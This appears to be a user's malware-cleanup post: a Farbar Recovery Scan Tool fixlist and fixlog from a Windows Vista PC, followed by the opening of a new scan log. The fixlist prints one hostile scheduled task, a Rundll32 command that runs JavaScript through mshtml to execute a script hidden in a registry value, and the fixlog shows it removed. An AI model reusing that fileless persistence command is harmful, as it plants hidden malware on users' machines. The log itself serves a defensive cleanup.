FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
C:\Users\finja\remove.exe
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll
Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} - 
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
EmptyTemp:

*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\eRecoveryService => value deleted successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\TaskbarNoNotification => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value deleted successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\TaskbarNoNotification => value deleted successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{FA23121F-EE7C-4BD8-8C06-123D087282C5} => value deleted successfully.
"HKCR\CLSID\{FA23121F-EE7C-4BD8-8C06-123D087282C5}" => Key not found.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{F2413FFA-9DCC-48B3-A09A-625F44D7FA96} => value deleted successfully.
"HKCR\CLSID\{F2413FFA-9DCC-48B3-A09A-625F44D7FA96}" => Key not found.
Firefox Proxy settings were reset.
Firefox Proxy settings were reset.
Firefox Proxy settings were reset.
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] => not found.
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] => not found.
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] => not found.
FF Extension: No Name - tylerkeith11@aol.com [Not Found] => not found.
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] => not found.
compilerehtraceProt.exe => Service deleted successfully.
evrtspkgBckp.exe => Service deleted successfully.
FrozenGNUThumbnail.exe => Service deleted successfully.
FrozenSambaWindows.exe => Service deleted successfully.
C:\ProgramData\ZorkoKcesd => Moved successfully.
C:\Windows\system32\utilitylocalspl_86 => Moved successfully.
C:\Windows\system32\scrollingwin32Prot => Moved successfully.
C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A} => Moved successfully.
C:\ProgramData\EedtaWbezm => Moved successfully.
C:\ProgramData\UUdb => Moved successfully.
C:\Windows\Tasks\XPGILDE.job => Moved successfully.
C:\Windows\Tasks\MQZDOUD.job => Moved successfully.
C:\Users\finja\remove.exe => Moved successfully.
C:\Users\finja\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\finja\AppData\Local\Temp\sqlite3.dll => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} -" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1045E6B6-E707-475F-97CD-571E06C36511}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1045E6B6-E707-475F-97CD-571E06C36511}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{12725841-0DB7-461B-94D5-8A90F6589009}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12725841-0DB7-461B-94D5-8A90F6589009}" => Key deleted successfully.
C:\Windows\System32\Tasks\GoogleUpdater => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdater" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1EB9CADD-2506-46E7-96AD-5CBB99CAD30C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB9CADD-2506-46E7-96AD-5CBB99CAD30C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9038396b-6856-4ead-9ee7-1215f651f0aa" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{26928486-85D4-43D1-846F-D5189AE90D56}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{26928486-85D4-43D1-846F-D5189AE90D56}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{33B6F316-29F5-4DEA-A8CC-B9249563A4AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{33B6F316-29F5-4DEA-A8CC-B9249563A4AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3738576E-1797-480B-AB26-9BECD9BC9AB1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3738576E-1797-480B-AB26-9BECD9BC9AB1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4BF96ACD-C54D-472D-BD3D-8C4495786051}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BF96ACD-C54D-472D-BD3D-8C4495786051}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{50B6DF40-8A74-4768-B9E7-44B068036A93}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{50B6DF40-8A74-4768-B9E7-44B068036A93}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-3" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{521C87B6-4ECD-45FA-A21F-0987123DD4C6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{521C87B6-4ECD-45FA-A21F-0987123DD4C6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-6" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{547E6824-355F-4AC3-8FBC-7E4FBF25D3EF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{547E6824-355F-4AC3-8FBC-7E4FBF25D3EF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{665589FE-FED9-450D-8CAC-BCD6A34E666E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{665589FE-FED9-450D-8CAC-BCD6A34E666E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6ED78F91-0AE2-43BA-8C76-47269CF7A210}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6ED78F91-0AE2-43BA-8C76-47269CF7A210}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{793BBF80-2488-4871-8D11-6A461B28C8DE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{793BBF80-2488-4871-8D11-6A461B28C8DE}" => Key deleted successfully.
C:\Windows\System32\Tasks\MQZDOUD => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MQZDOUD" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7BC36AEC-816F-4BC2-93E6-9836D38AAD73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BC36AEC-816F-4BC2-93E6-9836D38AAD73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{88A4BAC1-045F-4DEC-B932-AEFCD853FCBB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88A4BAC1-045F-4DEC-B932-AEFCD853FCBB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8C6325F8-822B-4446-8F5E-79B27AA3A5D0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C6325F8-822B-4446-8F5E-79B27AA3A5D0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{928B2F3B-2C64-4AED-9F1B-93315F01FBDC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{928B2F3B-2C64-4AED-9F1B-93315F01FBDC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-7" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{99F31AC3-75A5-427A-A9A1-F7B67F954F82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99F31AC3-75A5-427A-A9A1-F7B67F954F82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-1" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A983A371-8E43-4C81-AB3D-1793E6C729DD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A983A371-8E43-4C81-AB3D-1793E6C729DD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{ADB99999-9CE5-4C49-8F93-40086B7A25B0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ADB99999-9CE5-4C49-8F93-40086B7A25B0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\afbfdcf4-7553-4735-ab81-4373cca9a051-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B07D5064-3E65-4825-82D2-D8ABAFA800DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B07D5064-3E65-4825-82D2-D8ABAFA800DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B31760E5-4C25-4B17-AA41-19EBAB4B5530}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B31760E5-4C25-4B17-AA41-19EBAB4B5530}" => Key deleted successfully.
C:\Windows\System32\Tasks\XPGILDE => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\XPGILDE" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CD87FD16-CBAA-439E-97ED-F35F08A43569}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD87FD16-CBAA-439E-97ED-F35F08A43569}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4d0ec2e7-584d-427b-a601-b9b87a4eb405-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D577D774-768A-41F6-807D-4B88E2B8F71A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D577D774-768A-41F6-807D-4B88E2B8F71A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E911148E-9670-41D8-BAE6-AB49D00F4C5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E911148E-9670-41D8-BAE6-AB49D00F4C5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EAA78C2F-DE4A-448D-B187-69456B16B48A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EAA78C2F-DE4A-448D-B187-69456B16B48A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-5" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F6739869-2927-42C5-B8E3-6A24E4A7A5A4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6739869-2927-42C5-B8E3-6A24E4A7A5A4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\04b071f9-0b45-4ff0-af73-073c440df543-2" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB314ECF-96F0-41DC-8CC2-C2561140CB57}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB314ECF-96F0-41DC-8CC2-C2561140CB57}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6" => Key deleted successfully.
C:\Windows\Tasks\MQZDOUD.job not found.
C:\Windows\Tasks\XPGILDE.job not found.
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully.
C:\ProgramData\TEMP => ":9E22BBE8" ADS removed successfully.
EmptyTemp: => Removed 969.7 MB temporary data.


The system needed a reboot. 

==== End of Fixlog ====
         
FRST:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 06-12-2014 02
Ran by finja (administrator) on FINJA-PC on 06-12-2014 17:43:30
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
() C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Intel Corporation) C:\Windows\System32\GfxUI.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
